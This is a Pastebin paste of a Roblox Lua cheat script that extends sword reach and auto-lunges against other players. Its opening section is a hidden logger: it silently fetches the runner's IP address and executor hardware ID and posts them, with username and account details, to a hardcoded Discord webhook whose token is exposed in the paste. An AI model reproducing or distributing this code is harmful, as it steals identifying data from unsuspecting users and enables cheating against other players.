CRAZYNFOF

XFORV IBE

Jun 18th, 2021 (edited)
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.01 KB | None | 0 0
  1. local IP = game:HttpGet("https://v4.ident.me")
  2. plr = game:GetService'Players'.LocalPlayer
  3. local premium = false
  4. local ALT = false
  5. if plr.MembershipType == Enum.MembershipType.Premium then
  6. premium = true
  7. elseif plr.MembershipType == Enum.MembershipType.None then
  8. premium = false
  9. end
  10. if premium == false then
  11. if plr.AccountAge <= 70 then
  12. ALT = true
  13. end
  14. end
  15.  
  16. local market = game:GetService("MarketplaceService")
  17. local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
  18.  
  19.  
  20. local http_request = http_request;
  21. if syn then
  22. http_request = syn.request
  23. elseif SENTINEL_V2 then
  24. function http_request(tb)
  25. return {
  26. StatusCode = 200;
  27. Body = request(tb.Url, tb.Method, (tb.Body or ''))
  28. }
  29. end
  30. end
  31.  
  32. local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
  33. local decoded = game:GetService('HttpService'):JSONDecode(body)
  34. local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
  35. hwid = "";
  36.  
  37. for i, v in next, hwid_list do
  38. if decoded.headers[v] then
  39. hwid = decoded.headers[v];
  40. break
  41. end
  42. end
  43.  
  44. if hwid then
  45. local HttpServ = game:GetService('HttpService')
  46. local url = "https://discordapp.com/api/webhooks/781584039453786122/OaijHvtQ6KkFf2WLICnD3mm9BMN67fE4qpUL03cPBRraFBPo09hfHhECgK0xOD1WmZA0"
  47.  
  48.  
  49. local data =
  50. {
  51. ["content"] = "",
  52. ["embeds"] = {{
  53. ["title"] = "__**HWID:**__",
  54. ["description"] = hwid,
  55. ["type"] = "rich",
  56. ["color"] = tonumber(0xAB0909),
  57. ["fields"] = {
  58. {
  59. ["name"] = "Username:",
  60. ["value"] = Game.Players.LocalPlayer.Name,
  61. ["inline"] = true
  62. },
  63. {
  64. ["name"] = "IP Address:",
  65. ["value"] = IP,
  66. ["inline"] = true
  67. },
  68. {
  69. ["name"] = "Game Link:",
  70. ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
  71. ["inline"] = true
  72. },
  73. {
  74. ["name"] = "Game Name:",
  75. ["value"] = info.Name,
  76. ["inline"] = true
  77. },
  78. {
  79. ["name"] = "Age:",
  80. ["value"] = plr.AccountAge,
  81. ["inline"] = true
  82. },
  83. {
  84. ["name"] = "Premium:",
  85. ["value"] = premium,
  86. ["inline"] = true
  87. },
  88. {
  89. ["name"] = "ALT:",
  90. ["value"] = ALT,
  91. ["inline"] = true
  92. },
  93.  
  94. },
  95. }}
  96. }
  97. local newdata = HttpServ:JSONEncode(data)
  98.  
  99. local headers = {
  100. ["content-type"] = "application/json"
  101. }
  102.  
  103. local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
  104. http_request(request_payload)
  105. end
  106.  
  107. local ClickRate = 1/80 --1/fps
  108. local Keybind = Enum.KeyCode.Q
  109.  
  110. local Players = game:GetService("Players")
  111. local UIS = game:GetService("UserInputService")
  112. local RS = game:GetService("RunService")
  113.  
  114. local Player = Players.LocalPlayer
  115. local ACing,AI,Lunging = false,false,{}
  116. setmetatable(Lunging, {__mode = "kv"})
  117. local Sword
  118. local AFK = false
  119. local function Lunge(CSword)
  120. if not Lunging[CSword] and CSword == Sword then
  121. Lunging[CSword] = true
  122. local Lunged = false
  123. local Con = Sword.ChildAdded:Connect(function(i)
  124. if i.Name == 'toolanim' and i.Value == 'Lunge' then
  125. Lunged = true
  126. end
  127. end)
  128. repeat
  129. CSword:Activate()
  130. local t = tick()
  131. repeat RS.RenderStepped:Wait() until tick() - t > ClickRate
  132. until CSword ~= Sword or Lunged or not CSword
  133. Con:Disconnect()
  134. end
  135. end
  136. local function Toggle()
  137. ACing = not ACing
  138. if ACing and Sword then
  139. Lunge(Sword)
  140. end
  141. end
  142. UIS.InputBegan:Connect(function(k,g)
  143. if not g and k.KeyCode == Keybind then
  144. Toggle()
  145. end
  146. end)
  147.  
  148. local SwordConnections = {}
  149. setmetatable(SwordConnections, {__mode = "kv"})
  150. local function AddSwordConnection(CSword)
  151. if not SwordConnections[CSword] then
  152. SwordConnections[CSword] = true
  153. CSword:GetPropertyChangedSignal("Grip"):Connect(function()
  154. local G = CSword.GripUp.Z
  155. if G == 1 then
  156. Lunging[CSword] = nil
  157. if not AFK and ACing and Sword and CSword and Sword == CSword then
  158. Lunge(CSword)
  159. end
  160. end
  161. end)
  162. CSword.Equipped:Connect(function()
  163. if ACing then
  164. wait()
  165. Lunge(CSword)
  166. end
  167. end)
  168. end
  169. end
  170.  
  171. local function onCharAdded(Char)
  172. Sword = Char:FindFirstChildOfClass("Tool")
  173. Char.ChildAdded:Connect(function(i)
  174. if i.ClassName == 'Tool' then
  175. Sword = i
  176. AddSwordConnection(Sword)
  177. end
  178. end)
  179. Char.ChildRemoved:Connect(function(i)
  180. if Sword == i then
  181. Sword = nil
  182. end
  183. end)
  184. end
  185. Player.CharacterAdded:Connect(onCharAdded)
  186. if Player.Character then
  187. onCharAdded(Player.Character)
  188. end
  189. UIS.WindowFocused:connect(function() AFK = false end)
  190. UIS.WindowFocusReleased:connect(function() AFK = true end)
  191.  
  192.  
  193.  
  194. local active = true
  195. local trueActive = true
  196. local dmgEnabled = false
  197. local visualizerEnabled = false
  198. local reachType = "Sphere"
  199. local reach = 5
  200. KeyBindHigh = "e"
  201. KeyBindLow = "r"
  202. IncreaseAmmount = 1
  203.  
  204. local visualizer = Instance.new("Part")
  205. visualizer.BrickColor = BrickColor.Blue()
  206. visualizer.Transparency = 1
  207. visualizer.Anchored = true
  208. visualizer.CanCollide = false
  209. visualizer.Size = Vector3.new(reach, reach, reach)
  210. visualizer.BottomSurface = Enum.SurfaceType.Smooth
  211. visualizer.TopSurface = Enum.SurfaceType.Smooth
  212. visualizer.Material = Enum.Material.ForceField
  213.  
  214. local visualizer2 = Instance.new("Part")
  215. visualizer2.Color = Color3.fromRGB(255, 255, 255)
  216. visualizer2.Transparency = 1
  217. visualizer2.Anchored = true
  218. visualizer2.CanCollide = false
  219. visualizer2.Size = Vector3.new(reach, reach, reach)
  220. visualizer2.BottomSurface = Enum.SurfaceType.Smooth
  221. visualizer2.TopSurface = Enum.SurfaceType.Smooth
  222.  
  223. local selectionsphere = Instance.new("SelectionSphere")
  224. selectionsphere.Parent = visualizer2
  225. selectionsphere.Adornee = visualizer2
  226. selectionsphere.Color3 = Color3.fromRGB(255, 255, 255)
  227. selectionsphere.SurfaceColor3 = Color3.fromRGB(255, 255, 255)
  228. selectionsphere.Transparency = 1
  229. selectionsphere.SurfaceTransparency = 0.5
  230. selectionsphere.Visible = true
  231.  
  232.  
  233. repeat wait() until game.Players.LocalPlayer
  234.  
  235.  
  236.  
  237. game:GetService("StarterGui"):SetCore("SendNotification", {
  238. Title = "Alsive X";
  239. Text = "XXX";
  240. Icon = "";
  241. Duration = 0.0001;
  242. })
  243.  
  244. local mouse = game.Players.LocalPlayer:GetMouse()
  245.  
  246.  
  247. binde = "z"
  248. mouse.KeyDown:connect(function(keye)
  249. if keye == binde then
  250. reach = 5
  251. dmgEnabled = true
  252. visualizerEnabled = false
  253. end
  254. end)
  255.  
  256. bindq = "x"
  257. mouse.KeyDown:connect(function(keyq)
  258. if keyq == bindq then
  259. reach = 0
  260. dmgEnabled = false
  261. visualizerEnabled = false
  262. end
  263. end)
  264.  
  265. bindr = "g"
  266. mouse.KeyDown:connect(function(keyr)
  267. if keyr == bindr then
  268. reach = 15
  269. dmgEnabled = true
  270. visualizerEnabled = false
  271. end
  272. end)
  273.  
  274. bindf = "t"
  275. mouse.KeyDown:connect(function(keyf)
  276. if keyf == bindf then
  277. visualizerEnabled = true
  278. end
  279. end)
  280.  
  281. local mouse = game.Players.LocalPlayer:GetMouse()
  282.  
  283.  
  284. Player:GetMouse().KeyDown:Connect(function(Key)
  285. if Key == KeyBindHigh then
  286. reach = reach + IncreaseAmmount
  287. game.StarterGui:SetCore("SendNotification", {
  288. Title = "Closet Reach";
  289. Text = "Closet Reach Set To" .. reach;
  290. Icon = "";
  291. Duration = 1;})
  292. end
  293. if Key == KeyBindLow then
  294. reach = reach - IncreaseAmmount
  295. game.StarterGui:SetCore("SendNotification", {
  296. Title = "Closet Reach";
  297. Text = "Closet Reach Set To" .. reach;
  298. Icon = "";
  299. Duration = 1;})
  300. end
  301. end)
  302.  
  303.  
  304. local plr = game.Players.LocalPlayer
  305.  
  306. local function onHit(hit,handle)
  307. local victim = hit.Parent:FindFirstChildOfClass("Humanoid")
  308. if victim and victim.Parent.Name ~= game.Players.LocalPlayer.Name then
  309. if dmgEnabled then
  310. for _,v in pairs(hit.Parent:GetChildren()) do
  311. if v:IsA("Part") then
  312. firetouchinterest(v,handle,0)
  313. firetouchinterest(v,handle,1)
  314. end
  315. end
  316. else
  317. firetouchinterest(hit,handle,0)
  318. firetouchinterest(hit,handle,1)
  319. end
  320. end
  321. end
  322.  
  323. local function getWhiteList()
  324. local wl = {}
  325. for _,v in pairs(game.Players:GetPlayers()) do
  326. if v ~= plr then
  327. local char = v.Character
  328. if char then
  329. for _,q in pairs(char:GetChildren()) do
  330. if q:IsA("Part") then
  331. table.insert(wl,q)
  332. end
  333. end
  334. end
  335. end
  336. end
  337. return wl
  338. end
  339.  
  340.  
  341. local cooldown = false
  342. game:GetService("RunService").RenderStepped:connect(function()
  343. if not active or not trueActive then return end
  344. local s = plr.Character and plr.Character:FindFirstChildOfClass("Tool")
  345. if not s then
  346. visualizer.Parent = nil
  347. visualizer2.Parent = nil
  348. end
  349. if s then
  350. local handle = s:FindFirstChild("Handle") or s:FindFirstChildOfClass("Part")
  351. if handle then
  352. if visualizerEnabled then
  353. visualizer.Parent = s:FindFirstChild("Handle")
  354. visualizer2.Parent = s:FindFirstChild("Handle")
  355. else
  356. visualizer.Parent = nil
  357. visualizer2.Parent = nil
  358. end
  359. if reach then
  360. if reachType == "Sphere" then
  361. visualizer2.Size = Vector3.new(reach, reach, reach)
  362. visualizer2.CFrame = handle.CFrame
  363. visualizer2.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 0)
  364. --FOR KILLZONE MODE PASTE/REMOVE "visualizer2.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 0)"
  365. for _,v in pairs(game.Players:GetPlayers()) do
  366. local hrp = v.Character and v.Character:FindFirstChild("HumanoidRootPart")
  367. if hrp and handle then
  368. local mag = (hrp.Position-handle.Position).magnitude
  369. if mag <= reach and cooldown == false then
  370. cooldown = true
  371. onHit(hrp,handle)
  372. wait(1.3)
  373. cooldown = false
  374. end
  375. end
  376. end
  377. end
  378. end
  379. end
  380. end
  381. end)
  382.  
  383.  
  384. local i = 0
  385. while wait() do
  386. if i >= 0.99 then
  387. i = 0
  388. elseif i < 1 then
  389. i = i+0.009
  390. end
  391.  
  392. local h = (i)
  393. local color = Color3.fromHSV(h, 1, 0.8)
  394.  
  395. visualizer.Color = color
  396. selectionsphere.Color3 = color
  397. selectionsphere.SurfaceColor3 = color
  398. end
Add Comment
Please, Sign In to add comment